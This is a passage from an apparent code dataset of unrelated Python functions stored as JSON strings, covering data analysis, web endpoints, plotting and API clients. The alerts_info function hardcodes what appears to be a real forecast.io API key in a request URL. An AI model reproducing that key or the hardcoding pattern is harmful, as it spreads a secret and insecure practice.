dftippercentage['max_tip_pctg'].round().astype('int')\n # Rename as per response contract\n dftippercentage = dftippercentage.rename(\n columns={'max_tip_pctg': 'maxTipPercentage', 'trip_quarter': 'quarter'})\n # Convert the Response Dataframe to JSON String\n if dftippercentage.shape[0] == 1:\n dftippercentage = dftippercentage.drop(['trip_year', 'quarter'], axis=1)\n ret_json_str = dftippercentage.to_json(orient='records')[1:-1]\n else:\n j = dftippercentage.groupby(['trip_year'], as_index=False) \\\n .apply(lambda x: x[['quarter', 'maxTipPercentage']].to_dict('r')) \\\n .reset_index().drop('index', axis=1) \\\n .rename(columns={0: 'maxTipPercentages'}) \\\n .to_json(orient='records')\n ret_json_str = json.dumps(json.loads(j), indent=2, sort_keys=False)[1:-1]\n else:\n raise ValueError(\"No data found for this criteria or minimal parameter is missing\")\n except Exception as exp:\n expStr = repr(exp)\n res_dict = \"{'error':\"+ expStr+\"}\"\n ret_json_str = json.loads(json.dumps(res_dict,indent=2, sort_keys=False))\n status = 1\n\n return ret_json_str,status", "def calculate():\n print 'AJAX getJSON request to get current data and begin compute on new client'\n global isBegin, CurrentIndex, isFinished, ComputationTime, N, Row, RowIndex\n if isBegin:\n generate_random_texts(N)\n ComputationTime = time.time()\n RowIndex = (RowN - 1) * 256\n Row = FirstText[RowIndex:RowIndex + 255]\n part = SecondText[CurrentIndex:CurrentIndex+1024]\n isBegin = False\n else:\n Row = FirstText[RowIndex:RowIndex + 255]\n part = SecondText[CurrentIndex:CurrentIndex+1024]\n if isFinished:\n Row = ''\n part = ''\n return jsonify(current_row=Row, current_part=part)", "def footprint_demo(**kw):\n # Note: needs fixed slits in single_point()\n count = 1500000\n data = []\n for theta in np.linspace(0.15, 5, 30):\n n = single_point(theta=theta, count=count, trace=False, **kw)\n data.append((theta, np.sum(n.active)))\n print(data[-1])\n x, y = zip(*data)\n pylab.plot(x, np.array(y)/count)\n pylab.show()", "def output_job_overhead(self):\r\n results_dirname = get_param(\"results_dir\")\r\n filename = os.path.join(results_dirname,\r\n \"%s_%s\" % (get_param(\"file_prefix\"),\r\n \"overhead\"))\r\n overhead_file = open(filename, \"w\")\r\n overhead_file.write(\"ResponseTime\\tLongestTask\\n\")\r\n for job in self.completed_jobs:\r\n overhead_file.write(\"%d\\t%d\\n\" %\r\n (job.response_time(), job.longest_task))\r\n overhead_file.close()", "def overheads(NPT, DIT, NDIT):\n ov = 360. + 120. + NPT*NDIT*(DIT + 80. + 15.)\n print 'Telescope time in h = ', ov/3600.", "def trip_duration_stats(df):\n ##task3 Trip duration: total and average travel time\n ## time of each trip is given in seconds, it is converted into minutes and hours\n ##Task3.1 & 3.2 the total and average trip time, rounded to 2 decimal places are displayed in a table\n ##The shortest trip in the database is displayed in seconds\n ##The longest trip is displayed in seconds and in days\n total_travel_time=df['Trip Duration'].sum()\n average_travel_time=df['Trip Duration'].mean()\n travel_time={\"total\":pd.Series([total_travel_time,total_travel_time/60,total_travel_time/3600], index = ['Seconds', 'Minutes', 'Hours']),\n \"Average\":pd.Series([average_travel_time,average_travel_time/60,average_travel_time/3600], index = ['Seconds', 'Minutes', 'Hours'])}\n travel_time_data = pd.DataFrame(travel_time)\n shortest_time=df['Trip Duration'].min()\n longest_time=df['Trip Duration'].max()\n \n print(\"The shortest trip was\",shortest_time,\" seconds\")\n print(\"the longest trip was\",longest_time.round(2),\"seconds, almost in days\",(longest_time/(60*60*24)).round(2))\n print(\"=\"* 25)\n print('\\nThe total travel time in seconds, minutes and hours is given by: \\n', travel_time_data[\"total\"].to_frame())\n print(\"=\"* 25)\n print(\"\\nThe average travel time in seconds, minutes and hours is given by:\\n\",travel_time_data[\"Average\"].round(2).to_frame())\n print(\"=\"* 25)\n \n start_time = time.time()\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)", "def get_map_notes(map_json, **kwargs):\n length = kwargs.get(\"length\", -1)\n divisor = kwargs.get(\"divisor\", 4)\n tick_times = get_map_timing_array(map_json, length=length, divisor=divisor)\n\n objs = map_json[\"obj\"]\n obj_times = list(map(lambda obj: obj[\"time\"], objs))\n\n # 1 for circle, 2 for slider, 3 for spinner\n def get_note_type(obj):\n if not obj:\n return 0\n if obj[\"type\"] & 2:\n return 2\n elif obj[\"type\"] & 8:\n return 3\n return 1\n\n po = 0\n note_max_wait_time = kwargs.get(\"note_max_wait_time\", 1000)\n start_time = obj_times[0] - note_max_wait_time\n last_obj_time = start_time\n sliding = 0\n slider_end_time = 0\n spinning = 0\n spinner_end_time = 0\n data = []\n flow_data = []\n\n # constant multipliers and subtractions\n tlen_mp = 1/500\n tlen_s = 1\n bpm_mp = 1/120\n bpm_s = 1\n slen_mp = 1/150\n slen_s = 1\n\n # tick count from start of uninherited timing section\n uts_i = 0\n\n # tick is timestamp here\n for i, tick in enumerate(tick_times):\n\n if is_uts_begin(map_json, tick):\n uts_i = 0\n else:\n uts_i += 1\n\n # Attach extra vars at the end of each note data row\n tlen = get_tick_len(map_json, tick)\n bpm = 60000 / tlen\n slen = get_slider_len(map_json, tick)\n ex1 = tlen * tlen_mp - tlen_s\n ex2 = bpm * bpm_mp - bpm_s\n ex3 = slen * slen_mp - slen_s\n\n while obj_times[po] < tick - 5 and po < len(obj_times) - 1:\n po += 1\n if obj_times[po] >= tick - 5 and obj_times[po] <= tick + 5: # found note\n last_obj_time = tick\n note_type = get_note_type(objs[po])\n\n # calculate momentum\n if po >= 1:\n momentum = get_momentum(objs[po], objs[po-1], slen/tlen)\n else:\n momentum = 0\n\n # flow data\n if po >= 1:\n input_vector = get_input_vector(objs[po], objs[po-1])\n output_vector = get_output_vector(objs[po], objs[po-1])\n else:\n input_vector = [0, 0]\n output_vector = [0, 0]\n if input_vector is None or input_vector[0] is None or input_vector[1] is None:\n input_vector = [0, 0]\n if output_vector is None or output_vector[0] is None or output_vector[1] is None:\n output_vector = [0, 0]\n\n # end point\n endpoint = get_end_point(objs[po])\n flow_data.append([uts_i, tick, note_type, objs[po][\"x\"], objs[po][\"y\"], input_vector[0],\n input_vector[1], output_vector[0], output_vector[1], endpoint[0], endpoint[1]])\n\n # put data\n if note_type == 1:\n spinning = 0\n sliding = 0\n elif note_type == 2:\n sliding = 1\n slider_end_time = objs[po][\"sliderData\"][\"endTime\"]\n elif note_type == 3:\n spinning = 1\n spinner_end_time = objs[po][\"spinnerEndTime\"]\n # because the spinner sometimes get over 3 secs\n last_obj_time = spinner_end_time\n\n # TICK, TIME, NOTE, NOTE_TYPE, SLIDING, SPINNING, MOMENTUM, Ex1, Ex2, Ex3\n data.append([uts_i, tick, 1, note_type, sliding,\n spinning, momentum, ex1, ex2, ex3])\n elif spinning == 1:\n if tick >= spinner_end_time - 5:\n spinning = 0\n data.append([uts_i, tick, 1, 5, 0, 0, 0, ex1, ex2, ex3])\n else:\n data.append([uts_i, tick, 0, 0, 0, 1, 0, ex1, ex2, ex3])\n elif sliding == 1:\n if tick >= slider_end_time - 5:\n sliding = 0\n data.append([uts_i, tick, 1, 4, 0, 0, 0, ex1, ex2, ex3])\n else:\n data.append([uts_i, tick, 0, 0, 1, 0, 0, ex1, ex2, ex3])\n else: # not found\n if tick - last_obj_time < note_max_wait_time and tick >= start_time:\n data.append([uts_i, tick, 0, 0, 0, 0, 0, ex1, ex2, ex3])\n return data, flow_data", "def chart1(request):\n\n full_url = HttpRequest.build_absolute_uri(request)\n relative = HttpRequest.get_full_path(request)\n\n base_url = full_url[:-len(relative)]\n\n request_amount = ['10', '100', '200', '500', '1000']\n\n json_urls = list()\n xml_urls = list()\n\n for x in request_amount:\n json_urls.append(reverse('objects:leads_json', args=[x]))\n xml_urls.append(reverse('objects:leads_xml', args=[x]))\n\n json_data = list()\n xml_data = list()\n\n for x in json_urls:\n json_average=0\n for i in range (0,5):\n start = time.perf_counter()\n req = requests.get(base_url + x)\n end = time.perf_counter()\n json_average += (end-start)\n json_data.append((json_average)/5)\n\n for x in xml_urls:\n xml_average=0\n for i in range(0,5):\n start = time.perf_counter()\n req = requests.get(base_url + x)\n end = time.perf_counter()\n xml_average+=(end-start)\n xml_data.append((xml_average)/5)\n\n final_data = {\n 'labels': request_amount,\n 'datasets': [\n {\n 'label': 'JSON',\n 'backgroundColor': 'rgba(255, 99, 132, 0.2)',\n 'borderColor': 'rgba(255,99,132,1)',\n 'data': json_data,\n 'borderWidth': 2,\n 'yAxisID': 'first-y-axis'\n },\n {\n 'label': 'XML',\n 'backgroundColor': 'rgba(54, 162, 235, 0.2)',\n 'borderColor': 'rgba(54, 162, 235, 1)',\n 'data': xml_data,\n 'borderWidth': 2,\n 'yAxisID': 'first-y-axis'\n }\n ]\n }\n\n return JsonResponse(final_data)", "def MakeWpTPostFitPlots(jsonNames, postfix=\"\"):\n import numpy as np\n # hard code the w pt binning for now\n wptbins = np.array([0., 8.0, 16.0, 24.0, 32.0, 40.0, 50.0, 70.0, 100.0, 120.0])\n nbins = wptbins.shape[0] - 1\n\n hmu = ROOT.TH1F(\"hmu_wpt_{}\".format(postfix), \"hmu_wpt_{}\".format(postfix), nbins, wptbins)\n\n sysUncs = ['lumi_13TeV', 'Recoil', 'QCD', 'Prefire', 'norm_tt', 'effstat', 'norm_taunu', 'FSR', 'tagpt', 'norm_z']\n colors = {\"total\": 1, 'lumi_13TeV': 14, \"Recoil\": 2, \"QCD\": 3, \"Prefire\": 4, \"effstat\":6, \"norm_taunu\": 7, \"tagpt\": 8, \"norm_z\": 9, \"norm_tt\": 28, \"FSR\": 38}\n\n himpacts = OrderedDict()\n himpacts['total'] = ROOT.TH1F(\"htotal_wpt_{}\".format(postfix), \"htotal_wpt_{}\".format(postfix), nbins, wptbins)\n for unc in sysUncs: \n himpacts[unc] = ROOT.TH1F(\"h{}_wpt_{}\".format(unc, postfix), \"h{}_wpt_{}\".format(unc, postfix), nbins, wptbins)\n\n for ibin, jname in enumerate(jsonNames, start=1):\n with open(jname) as f:\n results = json.load(f)\n \n # assuming the 0th POI is the signal strength\n poiname = results['POIs'][0]['name']\n diff = results['POIs'][0]['fit'][1] - results['POIs'][0]['fit'][0]\n hmu.SetBinContent(ibin, results['POIs'][0]['fit'][1])\n hmu.SetBinError(ibin, diff)\n himpacts['total'].SetBinContent(ibin, abs(diff))\n\n # loop over the systematics, find the ones in the sysUncs list\n for systematic in results['params']:\n if systematic[\"name\"] in sysUncs:\n diff = systematic[\"impact_\"+poiname]\n himpacts[systematic[\"name\"]].SetBinContent(ibin, abs(diff))\n\n for key, val in himpacts.iteritems():\n val.SetLineColor(colors[key])\n\n hmu.SetLineColor(1)\n DrawHistos([hmu], ['W^{+}#rightarrow#mu^{+}#nu'], 0, 120, \"W p_{T} [GeV]\", 0.5, 1.5, \"#sigma_{Obs}/#sigma_{MC}\", \"hsignal_strength_\"+postfix, dology=False, legendPos=[0.92, 0.88, 0.70, 0.80])\n\n DrawHistos(himpacts.values(), himpacts.keys(), 0, 120, \"W p_{T} [GeV]\", 0, 0.20, \"Uncertainty\", \"himpacts_wpt_\"+postfix, dology=False, legendPos=[0.92, 0.88, 0.70, 0.40], drawashist=True)", "def convert(self, data, *args, **kwargs):\n\n # all of this is still quite ugly and verrrry specific...\n json_data = {}\n for hit in data[\"hits\"][\"hits\"]:\n # pprint(hit)\n\n # get the PQ\n pq = hit.get(\"_source\", {}).get(\"metadata\", {}).get(\"PanDAQueue\", None)\n if not pq:\n continue\n\n # get the list of all benchmark results\n latest_list = (\n hit.get(\"inner_hits\", {})\n .get(\"most_recent\", {})\n .get(\"hits\", {})\n .get(\"hits\", [])\n )\n if len(latest_list) == 0:\n continue\n\n # get the average of the latest benchmark results.\n # Only results not older than 7d, and a maximum of 50 results (whichever value is hit first).\n # If we have no values more recent than 7d, simply use the last available one (that PQ is probably not online anymore anyway)\n values = []\n for d in latest_list:\n date = datetime.datetime.strptime(\n d.get(\"_source\", {}).get(\"timestamp\", \"\"), \"%Y-%m-%dT%H:%M:%SZ\"\n )\n two_days_ago = datetime.datetime.now() - datetime.timedelta(days=2)\n seven_days_ago = datetime.datetime.now() - datetime.timedelta(days=7)\n\n if date > two_days_ago:\n # we are within the last two days, so we take all the measurements we can get!\n values.append(d)\n elif (date < two_days_ago) and (date > seven_days_ago):\n # we are between 2 and 7 days ago, so take only values if we don't have 25 values already\n if len(values) < 30:\n values.append(d)\n elif date < seven_days_ago:\n # we are further away than 7 days, so take a maximum of 5 values from here if we don't have 5 yet\n if len(values) < 10:\n values.append(d)\n\n to_average = [\n i.get(\"_source\", {})\n .get(\"profiles\", {})\n .get(\"fastBmk\", {})\n .get(\"value\", 0.0)\n for i in values\n ]\n json_data[pq] = {\n \"avg_value\": float(sum(to_average)) / len(to_average),\n \"measurements\": len(to_average),\n }\n # print(len(to_average))\n\n return json_data", "def run(self):\n new_tweets = pd.DataFrame(\n columns=[\"tweet_id\", \"congress\", \"session\", \"date\", \"vote\"],\n dtype=str,\n )\n for item in self.senate_data[\"vote_summary\"][\"votes\"][\"vote\"]:\n query = (\n \"congress == @self.congress \"\n \"and session == @self.session \"\n \"and date == @item['vote_date'] \"\n \"and vote == @item['vote_number']\"\n )\n\n # If the current vote isn't already processed, then process it\n if self.tweets.query(query).empty:\n try:\n text, party_data, vote_data = self.senate_obj.process_vote(\n item\n )\n status = self.twitter_api.update_status(text)\n # Keep track of new tweets to be reconciled with old\n # tweets later\n new_tweets = new_tweets.append(\n {\n \"tweet_id\": status.id_str,\n \"congress\": self.congress,\n \"session\": self.session,\n \"date\": item[\"vote_date\"],\n \"vote\": item[\"vote_number\"],\n **party_data,\n **vote_data,\n },\n ignore_index=True,\n )\n except Exception as e:\n # Tweet failed for some reason\n logging.error(\"Tweet failed\")\n logging.error(item)\n logging.error(e)\n\n # Only process a limited number of tweets in a single run\n if len(new_tweets) == self.MAX_TWEETS:\n break\n\n if not new_tweets.empty:\n logging.info(f\"Tweeted {len(new_tweets)} new votes\")\n self.__save(self.tweets.append(new_tweets))\n # Function needs to return something to work as a Cloud Function\n return new_tweets[\"tweet_id\"].to_json()\n else:\n return \"{}\" # Empty JSON object", "def get_updated_stats(request):\n\t# read current values in chart\n\tlog_file = open('./load_charts/static/load_charts/uptime_log', 'r')\n\tuptime_values = ast.literal_eval(log_file.read())\n\tlog_file.close()\n\t#defines current oldest entry\n\toldest_record = datetime.datetime.strptime(uptime_values[-1][\"date\"], '%Y-%m-%d %H:%M:%S')\n\t#defines a two minutes interval from now\n\ttime_interval = datetime.datetime.utcnow() - timedelta(minutes=2)\n\n\t# creates a dict with stats from uptime statistics (uptime, users ...)\n\tdata = parse_uptime()\n\t# default alert is -1 nothing is triggered\n\tdata[\"alert\"] = -1\n\n\t# we need at least a two minutes history\n\tif time_interval > oldest_record:\n\t\tthreshold = float(request.GET.get('threshold', ''))\n\t\tsum_avg = 0\n\t\tnb = 0\n\t\t# compute avg load on past two minutes\n\t\tfor pos, val in enumerate(uptime_values):\n\t\t\tval_date = datetime.datetime.strptime(val[\"date\"], '%Y-%m-%d %H:%M:%S')\n\t\t\tif val_date > time_interval:\n\t\t\t\tsum_avg += val[\"value\"]\n\t\t\t\tnb += 1\n\t\t# Case avg > threshold set alert to 1 else set alert to 0\n\t\tif nb:\n\t\t\tavg = sum_avg / nb\n\t\t\tdata[\"value\"] = avg\n\t\t\tif avg > threshold:\n\t\t\t\tdata[\"alert\"] = 1\n\t\t\telif avg < threshold:\n\t\t\t\tdata[\"alert\"] = 0\n\n\treturn HttpResponse(json.dumps(data))", "def tobs():\n # query for the last day\n\n # Create our session (link) from Python to the DB\n session = Session(engine)\n \n last_day = session.query(Measurement.date).order_by(Measurement.date.desc()).first()[0]\n len_months = 12\n # convert result to datetime format\n last_day = datetime.datetime.strptime(last_day, \"%Y-%m-%d\")\n # calculate start day\n start_day = last_day - datetime.timedelta(days=365)\n start_day = \"{:%Y-%m-%d}\".format(start_day)\n\n # Design a query to retrieve the last 12 months of temperature data and plot the results\n results = session.query(Measurement.date, Measurement.tobs, Measurement.station).\\\n filter(Measurement.date >= start_day ).\\\n order_by(Measurement.date).all()\n\n session.close()\n \n temps = []\n for result in results:\n temp_dict = {}\n temp_dict[\"date\"] = result.date\n temp_dict[\"tobs\"] = result.tobs\n temp_dict[\"station\"] = result.station\n temps.append(temp_dict)\n \n return jsonify(temps)", "def test_json_maths(pawprint_default_tracker_db_with_table):\n\n tracker = pawprint_default_tracker_db_with_table\n\n tracker.write(event=\"whisky\", metadata={\"uigeadail\": {\"value\": 123, \"lagavulin\": [4, 2]}})\n tracker.write(event=\"whisky\", metadata={\"uigeadail\": {\"value\": 456, \"lagavulin\": [5, 0]}})\n tracker.write(event=\"whisky\", metadata={\"uigeadail\": {\"value\": 758, \"lagavulin\": [7, 10]}})\n tracker.write(event=\"armagnac\", metadata={\"age\": \"XO\"})\n tracker.write(event=\"armagnac\", metadata={\"age\": 15})\n\n assert len(tracker.read()) == 5\n assert len(tracker.read(metadata__uigeadail__contains=\"lagavulin\")) == 3\n assert len(tracker.read(metadata__uigeadail__value__gt=123)) == 2\n assert len(tracker.read(metadata__uigeadail__value__gte=123)) == 3\n\n whiskies = tracker.sum(\"metadata__uigeadail__value\")\n assert len(whiskies) == 1\n assert whiskies.iloc[0][\"sum\"] == 1337\n\n assert len(tracker.read(metadata__contains=\"age\")) == 2\n assert len(tracker.read(metadata__age=\"XO\")) == 1", "def watch_worker():\n global isFinished, ComputationTime, UsersOnline, N, CurrentIndex, Count\n received_data = request.json\n Count += received_data\n if CurrentIndex >= N:\n print 'Second text got ', Count, ' entries of given row.'\n print '--- %s seconds ---' % (time.time() - ComputationTime)\n isFinished = True\n return jsonify(current_row='', current_part='')\n else:\n print 'Current row in second text: ', CurrentIndex / 256\n part = SecondText[CurrentIndex:CurrentIndex+1023]\n CurrentIndex += 1024\n return jsonify(current_row=Row, current_part=part)", "def lightening_reply_tally(user_name, msg_logs, scorecard_map):\n if not msg_logs:\n return\n\n prev_msg_ts = 0\n is_prev_msg_outgoing = is_my_outgoing_msg(ujson.loads(msg_logs[0][0]))\n\n for row in msg_logs:\n msg = ujson.loads(row[0])\n msg_ts = msg['CreateTime']\n time_delta = msg_ts - prev_msg_ts\n\n if is_my_outgoing_msg(msg):\n if not is_prev_msg_outgoing and time_delta <= ONE_MIN:\n # I replied quickly, bump my p value\n scorecard_map[user_name].my_pval += (60 - time_delta) / 120\n else:\n if is_prev_msg_outgoing and time_delta <= ONE_MIN:\n # Someone replied quickly, bump their p value\n scorecard_map[user_name].their_pval += (60 - time_delta) / 120\n\n prev_msg_ts = msg_ts\n is_prev_msg_outgoing = is_my_outgoing_msg(msg)", "def update_live_data(n, last_time, id1, id2, power):\n if power:\n raise PreventUpdate\n\n timer_start = perf_counter()\n # 1 sec delay so server has time to add live data\n end_time = datetime.now(timezone.utc) - timedelta(seconds=1)\n\n # Initialization and lag prevention\n if last_time is None or end_time - strptime_fix(last_time) > timedelta(seconds=3):\n logging.warning('Falling behind! Start %s End %s', last_time, end_time)\n return dash.no_update, dash.no_update, end_time.isoformat(), dash.no_update\n\n # Query data from SMIP\n logging.info(f'start_time {last_time} end_time {end_time}')\n timer_query_start = perf_counter()\n r = conn.get_data(last_time, end_time.isoformat(),\n [id1, id2], timeout=1)\n timer_query_end = perf_counter()\n response_json: dict = r.json()\n logging.debug(response_json.keys())\n if 'errors' in response_json:\n logging.error(response_json)\n raise Exception()\n data = response_json['data']['getRawHistoryDataWithSampling']\n logging.info('Got %s responses in %s seconds', len(\n data), timer_query_end - timer_query_start)\n\n # Used for measuring performance\n start_processing = perf_counter()\n\n # Unpack data\n def unpack(id: int):\n \"\"\"Unpacks return data into time and value lists\"\"\"\n id = int(id)\n time_list = [i['ts'] for i in data if int(i['id']) == id]\n val_list = [i['floatvalue'] for i in data if int(i['id']) == id]\n # SMIP always returns one entry before the start time for each ID, we don't need this\n if len(time_list) < 2 or len(val_list) < 2:\n return dash.no_update\n time_list.pop(0)\n val_list.pop(0)\n # Measure sampling rate\n rate = nan\n if len(time_list) > 1:\n rate = (strptime_fix(time_list[1])\n - strptime_fix(time_list[0])).total_seconds()\n return {'time_list': time_list, 'val_list': val_list, 'rate': rate}\n\n # Used for measuring performance\n data_processed = perf_counter()\n logging.info('Total %s Query %s Processing %s', data_processed - timer_start, timer_query_end - timer_query_start,\n data_processed - start_processing)\n\n return unpack(id1), unpack(id2), end_time.isoformat(), \\\n [f'Last updated {end_time.astimezone()},',\n html.Br(),\n f'received {len(data)} samples in {round(data_processed - timer_start, 3)} seconds']", "def refresh_counterfactual_json(request):\t\n\n\n \"\"\"\n the following json are for compound exposures\n \"\"\"\n #json_file = '/home/zhou/Downloads/jsons/compound/json_9.json'\n\tjson_file = '/Users/jiaozi/Downloads/jsons/compound/json_9.json'\n\n exposure_sequence = read_json(json_file)#list of exposures{mean,sd,non_rate}\n\n\tprimeCoordinator = PrimeCoordinator()\n\tprimeCoordinator.get_counterfactual_compound_exposures(exposure_sequence)\n\t\n\t# get the data in the interface\n\tb_output_mortality \t= primeCoordinator.output_baseline_mortality # baseline mortality list for all outcomes\n\tb_output_mortality_num \t= primeCoordinator.output_baseline_mortality_num # baseline mortality sum up for each outcome\n\tb_total_mortality \t= primeCoordinator.output_baseline_mortality_total# baseline mortality sum up for all outcomes\n\tc_output_mortality \t= primeCoordinator.output_counterfactual_mortality# counterfactual mortality for all outcomes\n\tc_output_mortality_num \t= primeCoordinator.output_counterfactual_mortality_num# counterfactual mortality for each outcome\n\tc_total_mortality \t= primeCoordinator.output_counterfactual_mortality_total# counterfactual mortality sum up for all outcomes\n\ttotal_population\t= primeCoordinator.output_total_population\n\tall_mortality_exposure\t= primeCoordinator.output_all_mortality_exposure\n\ttotal_death_averted\t= str(round(primeCoordinator.output_total_death_averted,0))\n\ttotal_death_baseline\t= str(primeCoordinator.output_total_death_baseline)\n\n\t#transmit the parameters\n\ttemplate = loader.get_template('primemodel/index.html')\n\tpara_view = {\n\t\t\t'b_output_mortality_num':\tb_output_mortality_num,\n\t\t\t'b_total_mortality':\t\tb_total_mortality,\n\t\t\t'c_output_mortality_num':\tc_output_mortality_num,\n\t\t\t'c_total_mortality':\t\tc_total_mortality,\n\t\t\t'total_population':\t\ttotal_population,\n\t\t\t'total_death_averted':\t\ttotal_death_averted,\n\t\t\t'total_death_baseline':\t\ttotal_death_baseline,\n\t\t\t'all_mortality_exposure':\tall_mortality_exposure\n\t\t\t}\n\n\t#context to transmit the parameters to show\n\tcontext = Context(para_view)\n\tresponse = template.render(context)\n\treturn HttpResponse(response)", "def output_per_job_size_response_time(self):\r\n results_dirname = get_param('results_dir')\r\n num_tasks_to_response_times = {}\r\n for job in self.completed_jobs:\r\n if job.num_tasks not in num_tasks_to_response_times:\r\n num_tasks_to_response_times[job.num_tasks] = []\r\n num_tasks_to_response_times[job.num_tasks].append(\r\n job.response_time())\r\n \r\n n = get_param(\"num_tasks\")\r\n probes_ratio = get_param(\"probes_ratio\")\r\n for num_tasks, response_times in num_tasks_to_response_times.items():\r\n filename = os.path.join(\r\n results_dirname,\r\n \"%s_response_time_%s\" % (get_param(\"file_prefix\"),\r\n num_tasks))\r\n if get_param('first_time'):\r\n f = open(filename, 'w')\r\n f.write(\"n\\tProbesRatio\\tUtil.\\tMean\\tStdDev\\t99Pctl\\t\"\r\n \"NetworkDelay\\n\")\r\n f.close()\r\n f = open(filename, 'a')\r\n f.write(\"%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\n\" %\r\n (n, probes_ratio, self.utilization,\r\n stats_mod.lmean(response_times), \r\n stats_mod.lstdev(response_times),\r\n stats_mod.lscoreatpercentile(response_times,.99),\r\n get_param(\"network_delay\")))\r\n f.close()", "def alerts_info(): \n\n\n user_id = session['user_id']\n user = User.query.get(user_id)\n lat = str(user.location.lat)\n lng = str(user.location.lng)\n\n r = requests.get('https://api.forecast.io/forecast/45713f3bbbe3402dbe4aff89c61caccd/' + lat + \",\" + lng)\n\n data = r.json()\n\n alerts = {\n 'apparentTemperature': data['currently']['apparentTemperature'],\n 'humidity': data['currently']['humidity'],\n \"nearestStormDistance\": data[\"currently\"][\"nearestStormDistance\"],\n \"summary\": data['currently'][\"summary\"], \n }\n\n return jsonify(alerts)", "def basic_stats(flights):\n return ...", "def pe_analysis():\r\n\r\n global params\r\n n = params['n']\r\n level = params['level']\r\n pemin = params['pemin']\r\n pemax = params['pemax']\r\n pestep = params['pestep']\r\n ns = params['ns']\r\n nt = params['nt']\r\n po = params['po']\r\n pf = params['pf']\r\n pe_dir = create_dir(TIMES_PATH + 'pe')\r\n filename = datetime.datetime.now().strftime(DATE_FORMAT) + '.csv'\r\n with open(pe_dir + filename, 'wb') as csvfile:\r\n fw = csv.writer(csvfile)\r\n fw.writerow(('lv', 'ns', 'nt', 'no', 'pe', 'ne', 'nf',\r\n 'method1', 'method2', 'method3_1', 'method3_2'))\r\n pe = pemin\r\n while pe <= pemax:\r\n no = max(int(round(po * nt)), 1)\r\n ne = max(int(round(pe * no)), 1)\r\n nf = max(int(round(pf * nt)), 1)\r\n times = [0] * 4\r\n for i in range(n):\r\n times = map(sum, zip(times, get_times(level, ns, nt, no, ne, nf)))\r\n show_progress('pe', pe, pemin, pemax, pestep, i, n)\r\n times = map(lambda x: float(x) / n, times)\r\n fw.writerow((level, ns, nt, no, pe, ne, nf) + tuple(times))\r\n pe += pestep\r\n csvfile.close()", "def _fetch_daily_internal(delta, swarming, process, endpoint, start, end, state,\n tags, parallel):\n out = {}\n with threading_utils.ThreadPool(1, parallel, 0) as pool:\n while start < end:\n cmd = _get_cmd(swarming, endpoint, _get_epoch(start),\n _get_epoch(start + delta), state, tags)\n pool.add_task(0, _run_json, start.strftime('%Y-%m-%d'), process, cmd)\n start += delta\n for k, v in pool.iter_results():\n sys.stdout.write('.')\n sys.stdout.flush()\n out[k] = v\n print('')\n return out", "def tobs():\n temps = engine.execute(\"SELECT date, tobs FROM Measurement WHERE date BETWEEN '2016-08-23' AND '2017-08-23'\").fetchall()\n\n # Convert list of tuples into normal list\n temps_list = list(np.ravel(temps))\n\n return jsonify(temps_list)", "def test(file, time, verbose):\n results = {\"wins\": 0, \"loses\": 0, \"turns\": [], \"timings\": []}\n click.echo(\" Starting the test\")\n file.write(\"[\")\n with click.progressbar(list(product(colors, repeat=4))) as bar:\n for goal in bar:\n timing = []\n if time:\n for i in range(4):\n start = timer()\n run(goal, verbose)\n end = timer()\n timing.append(end - start)\n start = timer()\n res = run(goal, verbose)\n end = timer()\n timing.append(end - start)\n res[\"time\"] = np.mean(timing)\n else:\n res = run(goal, verbose)\n file.write(json.dumps(res))\n file.write(\",\\n\")\n results[\"wins\" if res[\"result\"] else \"loses\"] += 1\n results[\"turns\"].append(res[\"turns\"])\n if timing:\n results[\"timings\"].append(res[\"time\"])\n file.write(\"]\")\n click.echo(\n f\"\"\"\\n Here are the results:\n I won {singular_or_plural(results['wins'], 'time')}\n I lost {singular_or_plural(results['loses'], 'time')}\n The average turn took {np.mean(results['turns'])} moves\"\"\"\n )\n if time:\n click.echo(f\" The average time was {np.mean(results['timings'])} seconds \\n\")", "def daily_stats():\r\n count_total_each_user.delay()\r\n delete_non_activated_account.delay()", "def getData(tme=currentTime):\n # attempts request 10 times\n for attempt in range(10):\n try:\n # make a request to the url and return it in json format\n url = \"https://api.darksky.net/forecast/%s/%s,%s,%s?exclude=minutely,hourly,daily,alerts,flags\" % (API_KEY, LAT, LNG, tme)\n return get(url).json()\n except:\n # Wait .05 seconds and try again\n sleep(.05)\n pass", "def stats():\n return jsonify(shorten.get_stats(get_db(), app.config['MINI_URL_BASE']))", "def store_info_json(tag_name, folder_name, ac, baz, peak2troughs, \n periods, zero_crossings_abs, station, startev, event,\n net_s, chan2, chan3, chan4, sta_s,\n loc_s, event_source, depth, magnitude):\n zv_max, nv_max, ev_max, rv_max, tv_max = peak2troughs[:]\n zv_per, nv_per, ev_per, rv_per, tv_per = periods[:]\n zv_zca, nv_zca, ev_zca, rv_zca, tv_zca = zero_crossings_abs[:]\n \n sampl_rate = ac[0].stats.sampling_rate\n TBA = baz[2] # Theoretical backazimuth [deg]\n distance = 0.001*baz[0]\n dic = OrderedDict([\n ('data', OrderedDict([\n ('translational', OrderedDict([\n ('network', net_s),\n ('station', sta_s),\n ('loc', loc_s),\n ('channel_N', chan3),\n ('channel_E', chan2),\n ('channel_Z', chan4)]))\n ])),\n ('event_id', event.resource_id.id),\n ('event_source', event_source),\n ('starttime', str(startev-180)),\n ('endtime', str(startev+3*3600)),\n ('station_latitude', str(ac[0].stats.coordinates['latitude'])),\n ('station_longitude', str(ac[0].stats.coordinates['longitude'])),\n ('event_latitude', event.preferred_origin().latitude),\n ('event_longitude', event.preferred_origin().longitude),\n ('magnitude', magnitude),\n ('depth', depth),\n ('depth_unit', 'km'),\n ('epicentral_distance', distance),\n ('epicentral_distance_unit', 'km'),\n ('theoretical_backazimuth', TBA),\n ('theoretical_backazimuth_unit', 'degree'),\n ('peak_filtered_vertical_vel', zv_max),\n ('dominant_period_vertical_vel',zv_per),\n ('vertical_vel_zero_crossing',zv_zca),\n ('peak_filtered_north_vel', nv_max),\n ('dominant_period_north_vel',nv_per),\n ('north_vel_zero_crossing',nv_zca),\n ('peak_filtered_east_vel', ev_max),\n ('dominant_period_east_vel',ev_per),\n ('east_vel_zero_crossing',ev_zca),\n ('peak_filtered_radial_vel',rv_max),\n ('dominant_period_radial_vel',rv_per),\n ('radial_vel_zero_crossing',rv_zca),\n ('peak_filtered_transverse_vel',tv_max),\n ('dominant_period_transverse_vel',tv_per),\n ('transverse_vel_zero_crossing',tv_zca),\n ('peak_filtered_vel_unit', 'nm/s'),\n ('zero_crossing_unit','sec. from trace start')\n ])\n\n outfile = 